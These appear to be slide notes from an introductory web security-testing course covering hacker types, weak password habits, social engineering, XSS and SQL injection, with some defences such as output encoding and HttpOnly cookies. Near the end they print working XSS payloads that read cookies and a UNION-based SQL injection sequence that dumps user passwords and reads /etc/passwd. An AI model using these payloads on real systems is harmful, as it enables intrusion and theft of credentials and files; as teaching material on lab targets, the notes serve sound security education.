Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose
Why do real hackers hack? What is their motivation? Money? Damage to opponent Fame Government does hacking to get information
Also known as ethical hackers, White Hat hackers are the good guys of the hacker world. They’ll help you remove a virus or PenTest a company. Black Hat – Also known as crackers, these are the men and women you hear about in the news. They find banks or other companies with weak security and steal money or credit card information. The surprising truth about their methods of attack is that they often use common hacking practices they learned early on. Gray Hat – Nothing is ever just black or white; the same is true in the world of hacking. Gray Hat hackers don’t steal money or information (although, sometimes they deface a website or two), yet they don’t help people for good (but, they could if they wanted to). These hackers comprise most of the hacking world, even though Black Hat hackers garner most (if not all) of the media’s attention.
Infrastructure Security Testing Hack windows machine to get full control Causing network to go down
Application Security Testing JIRA installed on a local server
When do you do security testing???
When should we do security testing?
Reconnaissance - mission to obtain information by visual observation or other detection methods a vulnerability is a weakness which allows an attacker to reduce a system's information assurance Exploit - causing unintended or unanticipated behaviour to occur on computer software, hardware, or something electronic (usually computerised) by taking advantage of vulnerabilities
i don’t like these guys i want to do some damage how do i start hacking lets think any ideas???
Show them wappalyzer. It shows versions as well. If the version of some software they are using has known vulnerabilities, that can be exploited.
Ask for details of password It is recommended to use more than 8 characters in password. How many have less than 8 characters password for email? How many have only small case? Blah…. What would be your guess for their password
What we were doing here is applying social engineering techniques to get to know your passwords or other important information.Can we really get details by just talking and not using a computer? Let’s see a video.
Default username and password like admin password for admin consoles. People use very common passwords (like password or just numbers, their names or dictionary words) 41% people use only lowercase password. Only about 4% use special characters in passwords 50% of people have password less than 8 characters in length (at least 8 is recommended)
XSS attacks are type of injection attacks in which the attacker injects malicious code in web pages that are viewed by other users of the application.
Basic using script tag Ask if you can just sanitize script tag.. Show how to bypass that -> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
Google Gruyere: Stored XSS: (New snippet) <a onmouseover="alert(1)" href="#">read this!</a> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
HTML encoding (< → <) URL encoding before inserting it into HTML HTML attribute encoding CSS encoding This HTTP response header enables the Cross-site scripting (XSS) filter built into some modern web browsers. This header is usually enabled by default anyway, so the role of this header is to re-enable the filter for this particular website if it was disabled by the user. HttpOnly flag is included in the HTTP response header, the cookie cannot be accessed through client side script
It happens when computers cannot tell difference between code and data
2 ' 2' # 2' OR 1=1 2' Union select null # 2' union Select null, null # 2' Union Select null, @@version # 2' Union Select null, database() # 2' union select null, table_name from information_schema.tables # 2' union select null, table_name from information_schema.tables where table_name like '%user%' # 2' Union select null, column_name from information_schema.columns where table_name='users' # 1' Union select null, concat(user, 0x0a,password) from users # 2' Union select null, LOAD_FILE('/etc/passwd') #